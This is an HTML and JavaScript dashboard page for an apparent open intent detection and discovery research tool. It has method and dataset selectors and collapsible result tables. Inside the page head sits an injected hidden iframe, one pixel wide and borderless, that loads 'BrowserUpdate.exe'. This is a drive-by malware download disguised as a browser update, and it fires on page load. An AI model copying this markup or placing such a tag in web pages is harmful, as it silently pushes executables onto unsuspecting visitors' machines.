<!DOCTYPE html>
<html class="x-admin-sm">

    <head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
        <meta charset="UTF-8">
        <title>New Intent Discovery System</title>
        <meta name="renderer" content="webkit">
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <meta name="viewport" content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi" />
        <link rel="stylesheet" href="/static/lib/xadmin/css/font.css">
        <link rel="stylesheet" href="/static/lib/xadmin/css/xadmin.css">
        <script type="text/javascript" src="/static/lib/jquery-3.2.1.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/layui/layui.js" charset="utf-8"></script>
        <script type="text/javascript" src="/static/lib/xadmin/js/xadmin.js"></script>
        <!--[if lt IE 9]>
            <script src="https://cdn.staticfile.org/html5shiv/r29/html5.min.js"></script>
            <script src="https://cdn.staticfile.org/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
    </head>
    <body>
        <div class="layui-fluid">
            <div class="layui-row">
                <!-- <div class="layui-card"> -->
                    
                    <div class="layui-card">
                        <div class="layui-card-body ">
                            <div class="layui-card">
                                <div style="width: 1060px; margin:10px  auto ;padding-top: 1%;">
                                    <form class="layui-form layui-col-space5" >
                                     
                                        <div class="layui-input-inline" style="padding-left: 9px;">
                                            <div id="title_btn1" class="layui-input-inline" style=" font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Detection Method
                                            </div >
                                            <div id="title_btn2"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Discovery Method
                                            </div>
                                            <div id="title_btn3"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 175px; border: 0px solid red;">
                                                Kown Intent Ratio
                                            </div>
                                            <div id="title_btn3"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 185px; border: 0px solid red;">
                                                Labeled Ratio
                                            </div>
                                            <div id="title_btn3"class="layui-input-inline" style="font-weight:600; font-size:15px;color:#555555;width: 200px; border: 0px solid red;">
                                                Dataset Name
                                            </div>
                                           
                                        </div>
                                        
                                        <div class="layui-input-inline " >
                                            <div class="layui-input-inline" id='select_'>
                                                <select id="detection_method" name="detection_method" lay-filter="dataset" >
                                                    
                                                
                                                        <option  value="ADB"  >ADB</option>
                                                     
                                                        <option  value="DeepUnk" >DeepUnk</option>
                                                        <option  value="DOC" >DOC</option>
                                                     
                                                        <option  value="MSP" >MSP</option>
                                                        <option  value="OpenMax" >OpenMax</option>                 
                                                    
                                                </select>
                                            </div>
                                            <div class="layui-input-inline" id='select_'>
                                                <select id="discovery_method" name="discovery_method" lay-filter="dataset" >
                                                    
                                                
                                                        <option  value="DeepAligned"  >DeepAligned</option>
                                                     
                                                        <option  value="CDACPlus" >CDACPlus</option>
                                                        <option  value="DTC_BERT" >DTC_BERT</option>
                                                        <option  value="KCL_BERT" >KCL_BERT</option>
                                                        <option  value="MCL_BERT" >MCL_BERT</option>
                                                        <option  value="AG" >AG</option>
                                                        <option  value="DCN" >DCN</option>
                                                        <option  value="DEC" >DEC</option>
                                                        <option  value="KM" >KM</option>
                                                        <option  value="SAE" >SAE</option>
                                                       
                                                    
                                                </select>
                                            </div>
                                            <div class="layui-input-inline" >
                                                <select id="konw_intent" name="konw_intent" lay-filter="dataset" >
                                                    
                                                    <option  value="0.75" >75%</option>
                                                    <option  value="0.5" >50%</option>
                                                    <option  value="0.25"  >25%</option>
                                                 
                                                    
                                                    
                                                
                                                   
                                                
                                            </select>
                                            </div>
                                            <div class="layui-input-inline " >
                                                <select id="labeled_ratio" name="labeled_ratio" lay-filter="dataset" >
                                                    
                                                    <option  value="1.0" >100%</option>
                                                    <option  value="0.8" >80%</option>
                                                    <option  value="0.6" >60%</option>
                                                    <option  value="0.4" >40%</option>
                                                    <option  value="0.2"  >20%</option>
                                                 
                                                    
                                                   
                                                    
                                                    
                                                   
                                                
                                            </select>
                                            </div>
                                            <div class="layui-input-inline " >
                                                <select id="dataset_list" name="dataset_list" lay-filter="dataset" >
                                                    
                                                    <option  value="clinc" >clinc</option>
                                                    <option  value="banking"  >banking</option>
                                                 
                                                    <option  value="snips" >snips</option>
                                                    <option  value="stackoverflow" >stackoverflow</option>
                                                    <option  value="dbpedia" >dbpedia</option>
                                                    <option  value="atis" >atis</option>
                                                    
                                                   
                                                
                                            </select>
                                            </div>
                                            <div class="layui-inline layui-show-xs-block"style=" margin-right:0px">
                                                <button type="button" style="width: 60px;" class="layui-btn layui-input-inline" id="show2Btn" lay-filter="detection_test" lay-submit="" >Show</button>
                                            </div>
                                            
                                        </div>
                                    </form> 
                                    
                                </div>
                            </div>



                            <table class="layui-table" style="text-align:center;" lay-skin="nob">
                                <colgroup>
                                    <col width="20%">
                                    <col width="8%">
                                    <col width="40%">
                                    <col width="10%">
                                    <col width="23%">
                                </colgroup>
                            










                                <tbody>
                                    <tr>
                                        <!-- <a style="font-size:18px;margin-left:18px;">Realize one End to End Intent Discovery with Process Data</a> -->
                                        <!-- <a style="font-size:18px;margin-left:18px;">Realize an End-to-End framework for Open Intent Recognition</a> -->
                                        <div style="font-weight:700; font-size:20px;color:#555555">Realize An Overall Framework for Text Open Intent Recognition</div>
                                    </tr> 
                                    <tr>
                                        <td>
                                            <div style="display: flex;justify-content:space-around;">
                                                <button class="layui-btn layui-btn-normal" onclick="top.addTabNew('Dataset Management','thedataset/toDatasetList');" style="cursor:pointer;width:200px;">Step 1: Datasets</button>
                                            </div>
                                        </td>
                                        <th style="text-align:center"><i class="layui-icon" style="margin-left:40px;">&#xe602;&#xe602;&#xe602;</i></th>
                                        <td>
                                            <div style="display: flex;justify-content:space-around;">
                                                <button class="layui-btn layui-btn-normal" onclick="top.addTabNew('Detection Model Analysis','detection/model_analysis');" style="cursor:pointer;width:200px;">Step 2: Open Intent Detection</button>
                                            </div>
                                        </td>
                                        <th style="text-align:center"><i class="layui-icon" style="margin-left:40px;">&#xe602;&#xe602;&#xe602;</i></th>
                                        <td>
                                            <div style="display: flex;justify-content:space-around;">
                                                <button class="layui-btn layui-btn-normal" onclick="top.addTabNew('Discovery Model Analysis','discovery/model_analysis');" style="cursor:pointer;width:200px;">Step 3: Open Intent Discovery</button>
                                            </div>
                                        </td>
                                    </tr>
                                </tbody>
                            </table>
                            <table  id="datasetTable" lay-filter="demoEvent" style="border:2px;"></table>
                        </div>
                        <script type="text/html" id="barDemo">
                            <a title="Run Detection and Discovery" lay-event="run_pipeline" href="javascript:;">
                                <i class="iconfont left-nav-li ">&#xe719;</i>
                            </a>
                        </script>
                    </div>
                <!-- </div> -->
            </div>
        </div>
        <script>layui.use(['form', 'layer','jquery','table'],
            function() {
                $ = layui.jquery;
                var form = layui.form,
                layer = layui.layer;
                table = layui.table;
                detection_method = $('#detection_method').val()
                discovery_method = $('#discovery_method').val()  
                konw_intent = $('#konw_intent').val()
                labeled_ratio = $('#labeled_ratio').val() 
                dataset_list = $('#dataset_list').val()
                var datasetTableIns = table.render({
                    elem: '#datasetTable'
                    ,id: 'datasetTable'
                    ,url: '/annotation/getDatasetList' //设置异步接口
                    ,page: false
                    ,cols: [[ //表头
                          
                            {field: 'dataset_name', title: 'Dataset' ,width:'22%', align: 'center', rowspan:"2"}
                            ,{title: 'Detection' , align: 'center', colspan:"2"}
                            ,{title: 'Discovery' , align: 'center',  colspan:"2"}
                            // ,{title: 'Operation' , align: 'center', width: '18%', rowspan:"2", toolbar: '#barDemo'}
                        ],
                        [ //表头
                        {field: 'known_num', title: 'Known Intent Samples' , event: 'known',width:'22%', align: 'center', templet: function(d) {
                                return '<div style="position: relative;\n' + '    padding: 0 10px 0 20px;">' + d.known_num + '<i style="left: 0px;cursor:pointer;" title="Click here to see details." lay-tips="Show Details" class="layui-icon layui-colla-icon layui-icon-right"></i></div>'
                            }}
                            ,{field: 'unknown', title: 'Open Intent Samples', event: 'unknown',width:'22%',  align: 'center', templet: function(d) {
                                return '<div style="position: relative;\n' + '    padding: 0 10px 0 22px;">' + d.unknown + '<i style="left: 0px;cursor:pointer;" title="Click here to see details." lay-tips="Show Details" class="layui-icon layui-colla-icon layui-icon-right"></i></div>'
                            }}
                            ,{field: 'open', title: 'Discovered Intents' , event: 'open',width:'34%',align: 'center', templet: function(d) {
                                return '<div style="position: relative;\n' + '    padding: 0 10px 0 20px;">' + d.open + '<i style="left: 0px;cursor:pointer;" title="Click here to see details." lay-tips="Show Details" class="layui-icon layui-colla-icon layui-icon-right"></i></div>'
                            }}
                    ]] 
                    ,where: { //设定异步数据接口的额外参数，任意设
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                                
                                }
                    
                    
                    
                    //设置表头 
                    ,done:function (res, curr, count) {
                        // $('thead > tr > th[data-key="1-0-0"] > div').click(function(){
                        //     // Datasets
                        //     top.addTabNew('Dataset Management','thedataset/toDatasetList');
                        // })
                        // $('thead > tr > th[data-key="1-0-1"] > div').click(function(){
                        //     // Detection
                        //     top.addTabNew('Detection Model Analysis','detection/model_analysis');
                        // })
                        // $('thead > tr > th[data-key="1-0-2"] > div').click(function(){
                        //     // Discovery
                        //     top.addTabNew('Discovery Model Analysis','discovery/model_analysis');
                        // })

                        $('table > tbody').css('border','solid #000000')
                        $('table > tbody').css('border-width','1px 0px 0px 0px')

                        $('thead').css('border','solid #000000')
                        $('thead').css('border-width','1px 1px 1px 1px')
                        $('thead > tr > th').css('border','solid #000000')
                        $('thead > tr > th').css('border-width','1px 1px 1px 1px')

                        // $('thead > tr > th[data-key="1-0-0"] > div ,thead > tr > th[data-key="1-0-1"] > div ,thead > tr > th[data-key="1-0-2"] > div ').mouseenter(function(){
                        //     // Datasets
                        //     layer.msg('Click Here to See More')
                        //     //top.addTabNew('Dataset Management','thedataset/toDatasetList');
                        // })
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').addClass('layui-btn-lg layui-btn-radius layui-btn-normal')
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').css('color', '#F0F0F0')
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').css('cursor','pointer')
                    }
                });
                form.on('submit(detection_test)',
                function(data){
                    //show_image() 
                    detection_method = $('#detection_method').val()
                    discovery_method = $('#discovery_method').val()  
                    konw_intent = $('#konw_intent').val()
                    labeled_ratio = $('#labeled_ratio').val() 
                    dataset_list = $('#dataset_list').val()
                    console.log(detection_method,discovery_method,konw_intent,labeled_ratio,dataset_list) 
                    datasetTableIns.reload({
                            where: { //设定异步数据接口的额外参数，任意设
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                                
                                }
                            ,page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                                layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                                //,curr: 5 //设定初始在第 5 页
                                ,first: 'first'
                                ,last: 'last'
                            }
                        });


                    
                });


                //监听单元格事件
                table.on('tool(demoEvent)', function(obj){
                    var data = obj.data;
                    // console.log('tool(demoEvent):\t'+obj.event)
                    // console.log('80:tool(demoEvent)')
                    if((obj.event === 'known' || obj.event === 'open') && data.dataset_name != undefined){
                        // 打开折叠面板，显示对应信息
                        var trObj = layui.$(this).parent('tr'); //当前行
                        var accordion = true //开启手风琴，那么在进行折叠操作时，始终只会展现当前展开的表格。
                        var content = '<table lay-filter="subTableDemoEvent" ></table>' //内容
                        var optionForClass = getOptionsForClassTable(trObj, accordion, content, obj.event, data.dataset_name, obj.event)
                        collapseTable(optionForClass)
                    }else if (obj.event === 'unknown' && data.dataset_name != undefined){
                        
                        var trObj = layui.$(this).parent('tr'); //当前行
                        var accordion = true //开启手风琴，那么在进行折叠操作时，始终只会展现当前展开的表格。
                        var content = '<table></table>' //内容
                        var optionForClass = getOptionsForTextTableOfUnknown(trObj, accordion, content, obj.event, data.dataset_name, obj.event)
                        collapseTable(optionForClass)
                    }else if (obj.event === 'run_pipeline'){
                        console.log('run_pipeline')
                    }
                });
                // //监听单元格事件
                // table.on('tool(demoEvent)', function(obj){
                //     var data = obj.data;
                //     // console.log('tool(demoEvent):\t'+obj.event)
                //     // console.log('80:tool(demoEvent)')
                //     if((obj.event === 'known' || obj.event === 'open') && data.dataset_name != undefined){
                //         // 刷新下方表格
                //         class_type_2_color = {"known":'#01AAED',"open":'#FF5722'}
                //         class_type_2_title = {"known":'Known Intents',"open":'Discovered Intents'}
                //         sub_event = 'sub_'+obj.event
                //         var classTableIns = table.render({
                //             elem: "#classTable",
                //             url: '/annotation/getClassListByDatasetNameAndClassType',
                //             page: false,
                //             cols: [[
                //                 {field: 'label_name', title: class_type_2_title[obj.event] ,event: sub_event, align: 'center', templet: function(d) {
                //                     return '<div style="position: relative;\n' + '    padding: 0 10px 0 20px;">' + d.label_name + '<i style="left: 0px;" lay-tips="Show Details" class="layui-icon layui-colla-icon layui-icon-right"></i></div>'
                //                 }}
                //                 ,{field: 'label_text_num', title: 'Numbers' , width:'20%', align: 'center'}
                //             ]]
                //             ,where:{
                //                 "dataset_name": data.dataset_name,
                //                 "class_type": obj.event
                //             }
                //         });
                //     }else if (obj.event === 'unknown' && data.dataset_name != undefined){
                //         var classTableIns = table.render({
                //             elem: "#classTable",
                //             url: '/annotation/getTextListByDatasetForUnknown',
                //             page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                //                 layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                //                 //,curr: 5 //设定初始在第 5 页
                //                 ,first: 'first'
                //                 ,last: 'last'
                                
                //             },
                //             cols: [[ //表头
                //                     {field: 'text', title: 'Text' , align: 'center'}
                //                 ]]
                //             ,where:{
                //                 "dataset_name": data.dataset_name
                //             }
                //         });
                //     }else if (obj.event === 'run_pipeline'){
                //         console.log('run_pipeline')
                //     }
                // });

                table.on('tool(subTableDemoEvent)', function(obj){
                    var data = obj.data;
                    console.log('148:\t'+JSON.stringify(obj.index))
                    if(obj.event === 'sub_known' && data.label_name != undefined){
                        // console.log('94:tool(subTableDemoEvent)')
                        // 打开折叠面板，显示对应信息
                        var trObj = layui.$(this).parent('tr'); //当前行
                        var accordion = true //开启手风琴，那么在进行折叠操作时，始终只会展现当前展开的表格。
                        var content = '<table ></table>' //内容
                        var optionForText = getOptionsForTextTableOfKnown(trObj, accordion, content, obj.event, data.dataset_name, data.class_type, data.label_name)
                        collapseTable(optionForText)
                    }else if(obj.event === 'sub_open' && data.label_name != undefined){
                        // console.log(data.label_name)
                        // 打开折叠面板，显示对应信息
                        // $(this).parent().css({"color":"red"});
                        // $(this).parent().parent().children().filter('tr[data-index^="classTable"]').del()
                        var trObj = layui.$(this).parent('tr'); //当前行
                        var accordion = true //开启手风琴，那么在进行折叠操作时，始终只会展现当前展开的表格。
                        var content = '<table ></table>' //内容
                        var optionForText = getOptionsForTextTableOfOpen(trObj, accordion, content, obj.event, data.dataset_name, data.class_type, data.label_name)
                        collapseTable(optionForText)
                    }
                });

            });

            
            function collapseTable(options) {
                anotherEvent = {"known":"open","open":"known"}
                all_event = ['known', 'unknown', 'open']
                var trObj = options.elem;
                if (!trObj) return;
                var accordion = options.accordion,
                success = options.success,
                content = options.content || '';
                event = options.event;
                var tableView = trObj.parents('.layui-table-view'); //当前表格视图
                var id = tableView.attr('lay-id'); //当前表格标识
                var index = trObj.data('index'); //当前行索引
                var leftTr = tableView.find('.layui-table-fixed.layui-table-fixed-l tr[data-index="' + index + '"]'); //左侧当前固定行
                var rightTr = tableView.find('.layui-table-fixed.layui-table-fixed-r tr[data-index="' + index + '"]'); //右侧当前固定行
                var colspan = trObj.find('td').length; //获取合并长度
                var trObjChildren = trObj.next(); //展开行Dom
                var indexChildren = id + '-' + index + '-children'+'-'+event; //展开行索引
                var leftTrChildren = tableView.find('.layui-table-fixed.layui-table-fixed-l tr[data-index="' + indexChildren + '"]'); //左侧展开固定行
                var rightTrChildren = tableView.find('.layui-table-fixed.layui-table-fixed-r tr[data-index="' + indexChildren + '"]'); //右侧展开固定行
                var lw = leftTr.width() + 15; //左宽
                var rw = rightTr.width() + 15; //右宽

                //不存在就创建展开行
                if (trObjChildren.data('index') != indexChildren ) {
                    //装载HTML元素
                    for(i = 0;i<all_event.length;i++){
                        anotherIndexChildren = id + '-' + index + '-children'+'-'+all_event[i]; //展开行索引
                        if(trObjChildren.data('index') == anotherIndexChildren){
                            trObjChildren.remove()
                            //trObjChildren = trObj.after(tr).next().hide(); //隐藏展开行
                            console.log(trObj)
                            // trObj.parents().parents().find('td[lay-event="'+event+'"] i.layui-colla-icon').toggleClass("layui-icon-right layui-icon-down");
                            trObj.parents().parents().find('td[lay-event="'+all_event[i]+'"] i.layui-colla-icon').toggleClass("layui-icon-right layui-icon-down");
                            trObj.parents().parents().find('td[lay-event="'+all_event[i]+'"] i.layui-colla-icon').removeClass("layui-icon-down").addClass("layui-icon-right");
                            // trObj.parents().parents().find('td[lay-event="'+anotherEvent[event]+'"] i.layui-colla-icon').removeClass("layui-icon-down").addClass("layui-icon-right");
                            //trObj.siblings().find('td[lay-event="'+anotherEvent[event]+'"] i.layui-colla-icon').toggleClass("layui-icon-right layui-icon-down");
                        }
                    }
                    
                    
                    var tr = '<tr data-index="' + indexChildren + '" style="width:180%"><td colspan="' + colspan + '"><div style="height: auto;padding-left:' + lw + 'px;padding-right:' + rw + 'px" class="layui-table-cell">' + content + '</div></td></tr>';
                    // trObjChildren = trObj.after(tr).next(); //隐藏展开行
                    trObjChildren = trObj.after(tr).next().hide(); //隐藏展开行
                    // trObjChildren = trObj.after(tr).next().show(); //隐藏展开行
                    var fixTr = '<tr data-index="' + indexChildren + '"></tr>';//固定行
                    leftTrChildren = leftTr.after(fixTr).next().hide(); //左固定
                    rightTrChildren = rightTr.after(fixTr).next().hide(); //右固定
                }
                
                
                //展开|折叠箭头图标
                trObj.find('td[lay-event="'+event+'"] i.layui-colla-icon').toggleClass("layui-icon-right layui-icon-down");
                                
                //显示|隐藏展开行
                trObjChildren.toggle();
                //开启手风琴折叠和折叠箭头
                if (accordion) {
                    console.log('226:\t'+JSON.stringify(trObj))
                    // $(trObj).parent().children().filter('tr[data-index^="classTable"]').css({"color":"red"});
                    // trObj.find('td[lay-event="'+event+'"] i.layui-colla-icon').toggleClass("layui-icon-down layui-icon-right");
                    trObj.siblings().find('td[lay-event="'+event+'"] i.layui-colla-icon').removeClass("layui-icon-down").addClass("layui-icon-right");
                    trObjChildren.siblings('[data-index^="classTable"]').hide(); //展开
                    rightTrChildren.siblings('[data-index^="classTable"]').hide(); //左固定
                    leftTrChildren.siblings('[data-index^="classTable"]').hide(); //右固定
                }
                success(trObjChildren, indexChildren); //回调函数
                heightChildren = trObjChildren.height(); //展开高度固定
                rightTrChildren.height(heightChildren + 115).toggle(); //左固定
                leftTrChildren.height(heightChildren + 115).toggle(); //右固定
            }

            function getOptionsForClassTable(trObj, accordion, content, event, dataset_name, class_type){
                class_type_2_color = {"known":'#01AAED',"open":'#FF5722'}
                class_type_2_title = {"known":'Known Intents',"open":'Discovered Intents (Keyword, Confidence)'}
                sub_event = 'sub_'+event
                var optionForClassTable = {
                    elem: trObj,
                    accordion: accordion,
                    content: content,
                    event: event,
                    success: function(trObjChildren, index) { //成功回调函数
                        //trObjChildren 展开tr层DOM
                        //index 当前层索引
                        detection_method = $('#detection_method').val()
                        discovery_method = $('#discovery_method').val()  
                        konw_intent = $('#konw_intent').val()
                        labeled_ratio = $('#labeled_ratio').val() 
                        dataset_list = $('#dataset_list').val()
                        trObjChildren.find('table').attr("id", index);
                        table.render({
                            elem: "#" + index,
                            url: '/annotation/getClassListByDatasetNameAndClassType',
                            cellMinWidth: 80,
                            page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                                layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                                //,curr: 5 //设定初始在第 5 页
                                ,first: 'first'
                                ,last: 'last'
                                
                            },
                            cols: [[
                                {field: 'label_name', title: class_type_2_title[class_type] ,event: sub_event, align: 'center', templet: function(d) {
                                    label_name_tmp = d.label_name;
                            if (d.label_name == "<UNK>" || d.label_name == "oos"){
                                label_name_tmp = "< UNK >"
                            }
                                    return '<div style="position: relative;\n' + '    padding: 0 10px 0 20px;">' + label_name_tmp + '<i style="left: 0px;" lay-tips="Show Details" class="layui-icon layui-colla-icon layui-icon-right"></i></div>'
                                }}
                                ,{field: 'label_text_num', title: 'Numbers' ,width:'20%', align: 'center'}
                            ]]
                            ,where:{
                                "dataset_name": dataset_name,
                                "class_type": class_type,
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                            }
                        });


                    }
                }
                return optionForClassTable;
            }


            
            function getOptionsForTextTableOfKnown(trObj, accordion, content, event, dataset_name, class_type, label_name){
                console.log('dataset_name:\t'+dataset_name+'\nclass_type:\t'+class_type+'\nlabel_name:\t'+label_name)
                var optionForClassTable = {
                    elem: trObj,
                    accordion: accordion,
                    content: content,
                    event: event,
                    success: function(trObjChildren, index) { //成功回调函数
                        //trObjChildren 展开tr层DOM
                        //index 当前层索引
                        detection_method = $('#detection_method').val()
                        discovery_method = $('#discovery_method').val()  
                        konw_intent = $('#konw_intent').val()
                        labeled_ratio = $('#labeled_ratio').val() 
                        dataset_list = $('#dataset_list').val()
                        trObjChildren.find('table').attr("id", index);
                        table.render({
                            elem: "#" + index,
                            url: '/annotation/getTextListByDatasetClassTypeLabelName',
                            cellMinWidth: 80,
                            page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                                layout: ['prev', 'next' , 'count' ] //自定义分页布局
                                //,curr: 5 //设定初始在第 5 页
                                ,first: 'first'
                                ,last: 'last'
                                
                            },
                            cols: [[ //表头
                                    {field: 'text', title: 'Text' , align: 'left', templet: function(d) {
                                    return "<a style='width:inherit;display:block;white-space:normal;'>"+d.text+"</a>"
                                }}
                                    ,{field: 'label_name', title: 'True Label' , align: 'center', templet: function(d) {
                                        label_name_tmp = d.label_name;
                            if (d.label_name == "<UNK>" || d.label_name == "oos"){
                                label_name_tmp = "< UNK >"
                            }
                                        return "<a style='width:inherit;display:block;white-space:normal;'>"+label_name_tmp+"</a>"
                                }}
                                ]]
                            ,where:{
                                "dataset_name": dataset_name,
                                "class_type": class_type,
                                "label_name": label_name,
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                            }
                        });

                    }
                }
                return optionForClassTable;
            }

            function getOptionsForTextTableOfOpen(trObj, accordion, content, event, dataset_name, class_type, label_name){
                var optionForClassTable = {
                    elem: trObj,
                    accordion: accordion,
                    content: content,
                    event: event,
                    success: function(trObjChildren, index) { //成功回调函数
                        //trObjChildren 展开tr层DOM
                        //index 当前层索引
                        detection_method = $('#detection_method').val()
                        discovery_method = $('#discovery_method').val()  
                        konw_intent = $('#konw_intent').val()
                        labeled_ratio = $('#labeled_ratio').val() 
                        dataset_list = $('#dataset_list').val()
                        trObjChildren.find('table').attr("id", index);
                        table.render({
                            elem: "#" + index,
                            url: '/annotation/getTextListByDatasetClassTypeLabelName',
                            page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                                layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                                //,curr: 5 //设定初始在第 5 页
                                ,first: 'first'
                                ,last: 'last'
                                ,limit: '5'
                                ,curr: '1'
                                
                            },
                            cols: [[ //表头 
                                    {field: 'text', title: 'Text' , align: 'left',  rowspan:"2", templet: function(d) {
                                    return "<a style='width:inherit;display:block;white-space:normal; '>"+d.text+"</a>"
                                }}
                                    ,{title: 'Discovery' , align: 'center',  colspan:"6" ,border:"1px solid"}
                                ],
                                [ //表头
                                    {field: 'can_1', title: 'Key word A' ,width:'10%', align: 'center', templet: function(d) {
                                    return "<a style='display:block;white-space:normal;'>"+d.can_1+"</a>"
                                }}
                                    ,{field: 'conf_1', title: 'Conf A' ,width:'8%', align: 'center', templet: function(d) {
                                    return "<a style='text-align:center;display:block;white-space:normal;'>"+d.conf_1+"</a>"
                                }}
                                    ,{field: 'can_2', title: 'Key word B' ,width:'10%', align: 'center', templet: function(d) {
                                    return "<a style='display:block;white-space:normal;'>"+d.can_2+"</a>"
                                }}
                                    ,{field: 'conf_2', title: 'Conf B' ,width:'8%', align: 'center', templet: function(d) {
                                    return "<a style='display:block;white-space:normal;'>"+d.conf_2+"</a>"
                                }}
                                    ,{field: 'can_3', title: 'Key word C' ,width:'10%', align: 'center', templet: function(d) {
                                    return "<a style='display:block;white-space:normal;'>"+d.can_3+"</a>"
                                }}
                                    ,{field: 'conf_3', title: 'Conf C' ,width:'8%', align: 'center', templet: function(d) {
                                    return "<a style='display:block;white-space:normal;'>"+d.conf_3+"</a>"
                                }}
                            ]],done:function (res, curr, count) {
                        // $('thead > tr > th[data-key="1-0-0"] > div').click(function(){
                        //     // Datasets
                        //     top.addTabNew('Dataset Management','thedataset/toDatasetList');
                        // })
                        // $('thead > tr > th[data-key="1-0-1"] > div').click(function(){
                        //     // Detection
                        //     top.addTabNew('Detection Model Analysis','detection/model_analysis');
                        // })
                        // $('thead > tr > th[data-key="1-0-2"] > div').click(function(){
                        //     // Discovery
                        //     top.addTabNew('Discovery Model Analysis','discovery/model_analysis');
                        // })

                        $('table > tbody').css('border','solid #000000')
                        $('table > tbody').css('border-width','1px 0px 0px 0px')

                        $('thead').css('border','solid #000000')
                        $('thead').css('border-width','1px 1px 1px 1px')
                        $('thead > tr > th').css('border','solid #000000')
                        $('thead > tr > th').css('border-width','1px 1px 1px 1px')

                        // $('thead > tr > th[data-key="1-0-0"] > div ,thead > tr > th[data-key="1-0-1"] > div ,thead > tr > th[data-key="1-0-2"] > div ').mouseenter(function(){
                        //     // Datasets
                        //     layer.msg('Click Here to See More')
                        //     //top.addTabNew('Dataset Management','thedataset/toDatasetList');
                        // })
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').addClass('layui-btn-lg layui-btn-radius layui-btn-normal')
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').css('color', '#F0F0F0')
                        // $('thead > tr > th[data-key="1-0-0"] > div > span ,thead > tr > th[data-key="1-0-1"] > div > span ,thead > tr > th[data-key="1-0-2"] > div > span').css('cursor','pointer')
                    }
                            ,where:{
                                "dataset_name": dataset_name,
                                "class_type": class_type,
                                "label_name": label_name,
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                            }
                        });

                    }
                }
                return optionForClassTable;
            }


            function getOptionsForTextTableOfUnknown(trObj, accordion, content, event, dataset_name, class_type, label_name){
                var optionForClassTable = {
                    elem: trObj,
                    accordion: accordion,
                    content: content,
                    event: event,
                    success: function(trObjChildren, index) { //成功回调函数
                        //trObjChildren 展开tr层DOM
                        //index 当前层索引
                        detection_method = $('#detection_method').val()
                        discovery_method = $('#discovery_method').val()  
                        konw_intent = $('#konw_intent').val()
                        labeled_ratio = $('#labeled_ratio').val() 
                        dataset_list = $('#dataset_list').val()
                        trObjChildren.find('table').attr("id", index);
                        table.render({
                            elem: "#" + index,
                            url: '/annotation/getTextListByDatasetForUnknown',
                            cellMinWidth: 80,
                            page: { //支持传入 laypage 组件的所有参数（某些参数除外，如：jump/elem） - 详见文档
                                layout: ['prev', 'page', 'next' , 'count' ] //自定义分页布局
                                //,curr: 5 //设定初始在第 5 页
                                ,first: 'first'
                                ,last: 'last'
                                
                            },
                            cols: [[ //表头
                                    {field: 'text', title: 'Text' , align: 'left', templet: function(d) {
                                    return "<a style='width:inherit;display:block;white-space:normal;'>"+d.text+"</a>"
                                }}
                                ]]
                            ,where:{
                                "dataset_name": dataset_name,
                                "detection_method": detection_method,
                                "discovery_method":discovery_method,
                                "konw_intent":konw_intent,
                                "labeled_ratio":labeled_ratio,
                                "dataset_list":dataset_list
                            }
                        });

                    }
                }
                return optionForClassTable;
            }


            function toRunDataAnnotation(){
                var index = layer.load(2, {time: 10*1000});
            }

            function errorConfirm(errorMsg){
                layer.confirm(
                    errorMsg,
                    { icon:6, btn:['Confirm'], title:'Attention Please' }
                )
            }
            </script>
        <script>
        </script>
    </body>

</html>
